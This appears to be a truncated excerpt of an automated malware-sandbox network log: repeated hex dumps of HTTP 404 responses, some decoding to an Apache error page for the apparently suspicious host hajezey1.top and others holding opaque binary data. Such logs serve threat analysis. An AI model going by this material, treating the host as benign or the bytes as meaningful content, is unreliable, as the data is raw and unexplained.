Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 23 9f 87 cd 2b 80 78 51 a1 a2 8f 3c 08 d8 1c e0 32 02 50 08 08 d0 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 81 8a 20 59 55 11 5c b8 e6 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 81 ff cc 8a 40 d8 06 0e 45 87 1b 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 30 4d 6b 0e e1 a2 22 48 12 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 e2 5f 96 da 19 d1 3a 2d 6e 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 2d 77 14 2c d0 e8 b1 14 b9 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 e2 49 64 cd 25 5c 8d b7 73 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 07 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6f c9 ae 88 3b 95 36 e1 48 50 67 79 50 b8 81 be e6 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 5f 9f 87 cd 29 80 78 51 a1 a2 8f 4c 3d d8 1c e0 32 02 50 08 e8 df e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 e1 8a 20 59 55 11 5c 03 25 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 5d ca cc 8a 44 d8 06 0e 45 67 14 7d 63 fb e0 04 89 f9 d4 57 80 90 70 89 ec 24 4d 6b 0e e1 a2 22 48 32 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 83 97 5f 96 da 19 d1 3a 2d 12 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 7d 87 4a 04 38 cd 78 14 2c de e8 b1 14 c5 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 c2 49 64 cd 25 5c 8d b7 1d 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 a5 32 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6e c9 ae d4 15 95 36 e1 48 50 67 7e 50 b8 81 be e5 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f fc b7 a8 9f 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 19 7d 6f ab e1 04 89 63 7a 55 80 90 70 89 7f c8 4a 6b b6 e2 a2 22 48 42 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 9b 84 c8 c3 e7 b2 ec 1c e1 0c 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 ec ef f7 0a 83 8b 71 91 e0 75 7e 64 19 a0 77 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 31 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 fa 82 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 00 9d 82 ef d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 36 dd 3f 9d 43 cd 17 fe 2f 15 9f f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 0f 50 67 74 20 b9 87 f6 f4 81 de bb 34 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef fb c9 e3 de ea 50 38 02 97 b1 a4 57 25 57 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 00 fc ce 6e 47 b3 9a 4c 07 22 7d e6 a2 c6 62 b9 14 31 eb cd 40 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 04 dd be c6 83 41 5f 4f af b8 e8 01 be a2 57 ee 60 87 bd b7 6b 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 de 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 7f e2 46 aa 8f 8c f5 cf 9b 2b 25 9b f6 ba c9 1b b0 1c 67 74 d2 ff 95 87 cd 2b 80 78 51 a1 a2 8f 2c df d2 1c e0 32 02 50 08 08 d8 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 41 8f 20 59 55 11 5c 7c 3b 66 ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 bd 28 c6 8a 44 d8 06 0e 45 c7 1e 7d 6f fb e0 04 89 f9 d4 57 80 90 70 89 ec e4 4a 6b b6 f2 a2 22 48 52 df 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 23 36 55 96 da 19 d1 3a 2d b2 4e 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 71 87 4a 04 38 6d 72 14 2c d0 e8 b1 14 65 7c 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 a2 4c 64 cd 25 5c 8d b7 bf 2e 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 c5 d0 b8 be 34 56 9b 46 76 99 86 11 00 83 32 42 52 f7 c2 ae 64 0f 95 36 e1 48 52 67 